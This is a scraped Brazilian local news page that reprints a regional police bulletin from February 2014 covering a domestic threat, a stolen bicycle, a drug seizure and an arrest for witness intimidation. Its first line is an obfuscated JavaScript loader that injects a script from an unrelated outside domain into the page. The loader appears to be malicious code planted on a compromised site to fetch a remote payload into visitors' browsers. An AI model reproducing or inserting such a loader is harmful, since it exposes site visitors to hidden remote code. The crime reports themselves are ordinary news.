;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Destaque-Ocorrências policiais Carangola e Região - 20/02/2014. - Portal Carangola

www.portalcarangola.com

O primeiro portal de notícias de Carangola-MG e região.

Portal Carangola

O 1º site de notícias de Carangola e Região

Destaque-Ocorrências policiais Carangola e Região – 20/02/2014.

pmbn

OCORRÊNCIAS DE DESTAQUE MURIAÉ – 20/02/2014

                        75ª CIA PM- CARANGOLA-MG

POSSE DE ARMA DE FOGO EM DIVINO-MG.

            Em 19/02/14, por volta das 16hs40min, policiais militares compareceram ao Córrego Neblina, zona rural de Divino, onde foram informados pela vítima E.C.L., de 27 anos, que seu amásio J.B.R., de 30 anos, chegou na residência do casal e danificou o fogão, passando de forma agressiva a a meaçar a vítima com uma faca, tendo a vítima corrido sentido a BR 116, sendo atendida imediatamente por uma equipe da polícia rodoviária federal, que passava no local, tendo o autor evadido para um matagal. Os policiais militares, durante ao registro da ocorrência indagaram a vítima sobre a existência de arma de fogo na casa, tendo a mesma confirmado que o amásio era possuidor de uma garrucha de fabricação artesanal, a qual foi apreendida, não sendo o autor localizado.

 BICICLETA PRODUTO DE FURTO LOCALIZADA EM CARANGOLA-MG.

            Em 19/02/14, às 12hs05min, policiais militares durante patrulhamento pela Av. Magalhães Queiroz, bairro Santo Onofre, depararam com a adolescente C.F.S, de 14 anos, na condução de uma bicicleta, tipo mountain bike, de cor rosa, idêntica a uma bicicleta furtada na data de 16/02/14, tendo a adolescente notado a presença da equipe policial, e tendado empreender fuga na bicicleta, sendo abordada, vindo a esconder uma faca dentro de sua parte íntima. Os policiais imediatamente indagaram da adolescente sobre a procedência da bicicleta a qual passou a gritar e fazer xingamento e ameaças aos policiais, vindo em seguida colocar uma substância branca dentro da boca e engolido, provavelmente tratando-se de substância tóxica. Diante das ameaças e a conduta da adolescente a mesma foi dado voz de apreensão, sendo o fato acompanhado por uma conselheira tutelar, sendo que a adolescente, de forma agressiva passou a ameaçar o sargento Hercules, dizendo “ vou me juntar com os amiguinhos do tráfico e acabar com a vida dele e de sua linda família”, sendo a adolescente advertida de sua conduta, e mesmo assim passou a dizer que ela mesmo havia furtado a bicicleta que conduzia, em data passada no bairro Lacerdina, permanecendo os xingamentos e dando um pontapé no computador na tentativa de danificá-lo, sendo a adolescente apresentada na delegacia de polícia para demais providências.

                           76ª CIA PM – MURIAÉ

 OPERAÇÃO CONJUNTA PMMG E PMERJ NO COMBATE AO TRÁFICO DE DROGAS.    

            Em 19/02/2014 às 17h50min, policiais militares do Destacamento Policial de Palma, divisa com a cidade de Miracema-RJ, ao tomarem conhecimento de que dois suspeitos haviam cruzado a fronteira do estado com intuito de comprarem drogas na cidade de Miracema-RJ, deslocaram na captura dos suspeitos e contataram com policiais de serviço do DPO 02/36, os quais não mediram esforços em fazerem a campana e abordaram o veículo ônibus da empresa Paraibuna, sendo efetuada revista em dois acusados, onde a guarnição logrou êxito em encontrar uma sacola na cintura do adolescente A.A.O., de 17 anos, contendo em seu interior certa quantidade de pó branco aparentando ser cocaína e na poltrona, onde este estava sentado, 04 (quatro) sacolés contendo erva seca e picada e por debaixo da poltrona um tablete também de erva seca e prensada ambas aparentando ser maconha. O referido acusado informou estar acompanhado com o suspeito A.S.S., de 25 anos, ambos moradores na cidade de Palma e sendo os dois conhecidos dos policiais de Palma como traficantes. Diante dos fatos, a equipe policial procedeu a prisão do autor e apreensão do adolescente, ficando constatado que a droga tratava-se de 32,9 (trinta e dois virgula nove) gramas de canábis sativa (maconha) e 1,5 (um virgula cinco) gramas de cloridrato de cocaína, sendo que o autor foi ratificado sua prisão e encaminhado para Casa de Custódia de Itaperuna-RJ, e o adolescente permaneceu na delegacia de miracema a disposição da Promotoria daquela cidade.

 COAÇÃO NO CURSO DE PROCESSO EM MURIAÉ-MG.

            Em  19/02/14, por volta das 15hs, policiais militares foram acionados a comparecerem à Av. Dante Bruno, bairro dornelas, ocasião que a vítima L.F.D.B.S, de 27 anos, narrou que vinha sofrendo ameaças por parte do autor A.J.D., de 33 anos, o qual na data de 10/02/14, havia estuprado a filha de 10 anos da vítima, e que havia dito para a prima da vítima que estava armado, e disposto a matar ou morrer, caso a vítima prosseguisse com o processo. Por diversas vezes o autor foi visto por vizinhos, rondando a casa da vítima, motivo pelo qual o autor foi localizado e preso, sendo encaminhado a delegacia de polícia para demais providências.

   ASSESSORIA DE COMUNICAÇÃO ORGANIZACIONAL DO 47° BPM

RUA JOSÉ DE FREITAS LIMA Nº 47 – BAIRRO SAFIRA

MURIAÉ / MG

TELEFONE: 3696-3275. 3696-3265

Deixe um comentário

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *

Esse site utiliza o Akismet para reduzir spam. Aprenda como seus dados de comentários são processados.